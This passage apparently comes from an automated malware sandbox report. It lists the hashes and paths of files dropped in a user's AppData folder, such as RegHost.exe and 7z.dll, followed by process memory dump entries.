71004f5959cae1d17caf3604b703b04ea8862316

SHA256
12814babde304defc4acc2593618637b2f505e0b12798842ce2c6f2dc368450c

SHA512
f86e5b67f8e1c90f4c7da319c87759f15f6dc349b466b5b158a0ff5e28abe824423a2a917eb48826e22f2cf414b6d114d44bf96aa7786a7b0e28ccdcc672511e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
MD5
14a4954f51da5cf0d996b9a61dd4c0e5

SHA1
9418d49202324ba8477f5933b7d7480e507c49b9

SHA256
885272ff3bbe2f9503a92e3746d21e3ac78ea01a1e9ff890f750b182af23a5f0

SHA512
d4c2b5b4cdb096f8eeff30e0f53dc321273a196cfadedbf003d41c7fd330bee7290d2f262ed50b1d952136136154141c71169526f5ff46e17a32f9017bfdb5cb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
MD5
14a4954f51da5cf0d996b9a61dd4c0e5

SHA1
9418d49202324ba8477f5933b7d7480e507c49b9

SHA256
885272ff3bbe2f9503a92e3746d21e3ac78ea01a1e9ff890f750b182af23a5f0

SHA512
d4c2b5b4cdb096f8eeff30e0f53dc321273a196cfadedbf003d41c7fd330bee7290d2f262ed50b1d952136136154141c71169526f5ff46e17a32f9017bfdb5cb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
3a02ed97f9b92e307275316cc895becd

SHA1
6b8d2ac1c3ceeefd327b2a0fdb1a201bcbec4e51

SHA256
d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b

SHA512
41b66454d36267c5731498f301f37ad1b16f764c5d3857ccccdae4a4b05bb065c92aee7f656b72962736b4cded297b7bfd0f43c553a47838f7bd070890b50232

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
MD5
3a02ed97f9b92e307275316cc895becd

SHA1
6b8d2ac1c3ceeefd327b2a0fdb1a201bcbec4e51

SHA256
d05f37919d6b294b07cdb76a0a8bb39d50920a29575a0d86411948840ba45b8b

SHA512
41b66454d36267c5731498f301f37ad1b16f764c5d3857ccccdae4a4b05bb065c92aee7f656b72962736b4cded297b7bfd0f43c553a47838f7bd070890b50232

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
MD5
04ed50252c84264e20272d8eecbb5dfe

SHA1
dd8513a583de10c6d69f731dafe47134367ba4b0

SHA256
d8408a8cc89f9dfef7c994a822409f6bcb2dc6d8fe9af0edeb81c5347411641c

SHA512
536d148dde8feac142ca3b4a316ec3ecd76038c19d346d67cba9ae193722cd5aad890004e80fb37a56f14ff6aba25fed0f15f3845e5ce7fdbdb36612690e5f71

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
MD5
04ed50252c84264e20272d8eecbb5dfe

SHA1
dd8513a583de10c6d69f731dafe47134367ba4b0

SHA256
d8408a8cc89f9dfef7c994a822409f6bcb2dc6d8fe9af0edeb81c5347411641c

SHA512
536d148dde8feac142ca3b4a316ec3ecd76038c19d346d67cba9ae193722cd5aad890004e80fb37a56f14ff6aba25fed0f15f3845e5ce7fdbdb36612690e5f71

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
MD5
b58884e0aed5e1591fa72febf6dc8d47

SHA1
853e404cad2e662604497d7313ca8aa36cf4e9e1

SHA256
a9f1b987d3b1fb46c6d9ede15027f23c822967b699ce20b01f077faf6fa3e5d4

SHA512
20177c63929049ca80e8e7730858b7f33f3ee3fb76014e5e0c66ccc318747c1f434f77e1811775e13bd8d26e1a847a85cc7b09dce471525ab882da543a9dfe5c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
MD5
b58884e0aed5e1591fa72febf6dc8d47

SHA1
853e404cad2e662604497d7313ca8aa36cf4e9e1

SHA256
a9f1b987d3b1fb46c6d9ede15027f23c822967b699ce20b01f077faf6fa3e5d4

SHA512
20177c63929049ca80e8e7730858b7f33f3ee3fb76014e5e0c66ccc318747c1f434f77e1811775e13bd8d26e1a847a85cc7b09dce471525ab882da543a9dfe5c

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\7z.dll
MD5
42336b5fc6be24babfb87699c858fb27

SHA1
38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

SHA256
b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

SHA512
f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

Download Submit
memory/512-138-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/512-143-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/512-133-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/512-144-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/512-146-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/512-134-0x000000014011F187-mapping.dmp

Download
memory/512-147-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/512-149-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/512-150-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/512-135-0x00000000006D0000-0x00000000006D2000-memory.dmp

Filesize
8KB

Download
memory/512-151-0x00000000006D0000-0x00000000006D2000-memory.dmp

Filesize
8KB

Download
memory/512-137-0x00000000006D0000-0x00000000006D2000-memory.dmp

Filesize
8KB

Download
memory/512-140-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/1092-169-0x0000000000000000-mapping.dmp

Download
memory/2424-115-0x0000000000000000-mapping.dmp

Download
memory/3240-158-0x0000000000000000-mapping.dmp

Download
memory/3288-116-0x0000000000000000-mapping.dmp

Download
memory/3428-190-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3428-188-0x00000000001D0000-0x00000000001D2000-memory.dmp

Filesize
8KB

Download
memory/3428-197-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3428-195-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3428-184-0x000000014011F187-mapping.dmp

Download
memory/3428-198-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3428-185-0x00000000001D0000-0x00000000001D2000-memory.dmp

Filesize
8KB

Download
memory/3428-194-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3428-191-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3428-200-0x00000000001D0000-0x00000000001D2000-memory.dmp

Filesize
8KB

Download
memory/3428-192-0x0000000140000000-0x00000001402AD000-memory.dmp

Filesize
2.7MB

Download
memory/3880-203-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/3880-204-0x00000259B5C70000-0x00000259B5C72000-memory.dmp

Filesize
8KB

Download
memory/3880-189-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/3880-202-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/3880-196-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/3880-199-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/3880-187-0x00000259B5C70000-0x00000259B5C72000-memory.dmp

Filesize
8KB

Download
memory/3880-201-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/3880-186-0x00000259B5C70000-0x00000259B5C72000-memory.dmp

Filesize
8KB

Download
memory/3880-193-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/3880-181-0x0000000140913BEA-mapping.dmp

Download
memory/4024-117-0x0000000000000000-mapping.dmp

Download
memory/4348-156-0x0000021818170000-0x0000021818172000-memory.dmp

Filesize
8KB

Download
memory/4348-154-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/4348-141-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/4348-145-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/4348-148-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/4348-152-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/4348-153-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/4348-130-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/4348-131-0x0000000140913BEA-mapping.dmp

Download
memory/4348-155-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/4348-136-0x0000021818170000-0x0000021818172000-memory.dmp

Filesize
8KB

Download
memory/4348-139-0x0000021818170000-0x0000021818172000-memory.dmp

Filesize
8KB

Download
memory/4348-142-0x0000000140000000-0x0000000140AE8000-memory.dmp

Filesize
10.9MB

Download
memory/4356-160-0x0000000000000000-mapping.dmp

Download
memory/4496-125-0x0000000000000000-mapping.dmp

Download
memory/4508-124-0x0000000000000000-mapping.dmp

Download
memory/4560-118-0x0000000000000000-mapping.dmp

Download
memory/4660-119-0x0000000000000000-mapping.dmp

Download
memory/4744-175-0x0000000000000000-mapping.dmp

Download
memory/4928-161-0x0000000000000000-mapping.dmp

Download
memory/5040-174-0x0000000000000000-mapping.dmp

Download
memory/5096-168-0x0000000000000000-mapping.dmp

Download